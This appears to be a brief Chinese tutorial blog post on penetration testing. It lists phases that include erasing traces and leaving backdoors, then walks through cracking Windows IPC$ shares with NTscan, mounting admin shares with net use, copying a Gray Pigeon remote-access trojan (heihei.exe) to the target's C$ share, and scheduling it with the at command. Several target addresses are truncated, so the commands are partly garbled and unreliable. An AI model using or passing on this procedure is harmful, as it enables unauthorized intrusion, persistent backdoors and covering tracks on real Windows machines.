(更新時間)2021年04月25日 網(wǎng)絡(luò)安全 滲透測試
一:測試步驟
0.授權(quán)
1.信息收集
nslookup whois
1
2.掃描
namp=ip范圍 端口 80(IIS,apache,什么網(wǎng)站)scanport
高級掃描:如IIS漏洞2003-IIS6.0 2008IIS7.0
掃描網(wǎng)站漏洞()
3.利用
4.提權(quán)(shell環(huán)境、桌面環(huán)境、最高權(quán)限)
5.滅跡
6.留后門
7.滲透測試報告
二:具體流程
1.scanport掃描445端口
2.利用IPC$:
進行破解:NTscan
3.相關(guān)命令行
===================================== net use f: \10.1.1.2\share 密碼 /user:用戶 net use f: /del net use * /del net use f: \10.1.1.2\c$ 密碼 /user:用戶 net use \10.1.1.2\ipc$ 密碼 /user:用戶 ==========================================
1
2
3
4
5
6
7
4.制作
利用光盤上的灰鴿子軟件
5.植入(留后門)
copy d:\heihei.exe .1.1.2\c$
6.設(shè)置計劃任務(wù)自動執(zhí)行:
net time .1.1.2
at .1.1.2 11:11 “c:\heihei.exe”
7.等待客戶機上線
網(wǎng)絡(luò)
版權(quán)聲明:本文內(nèi)容由網(wǎng)絡(luò)用戶投稿,版權(quán)歸原作者所有,本站不擁有其著作權(quán),亦不承擔(dān)相應(yīng)法律責(zé)任。如果您發(fā)現(xiàn)本站中有涉嫌抄襲或描述失實的內(nèi)容,請聯(lián)系我們jiasou666@gmail.com 處理,核實后本網(wǎng)站將在24小時內(nèi)刪除侵權(quán)內(nèi)容。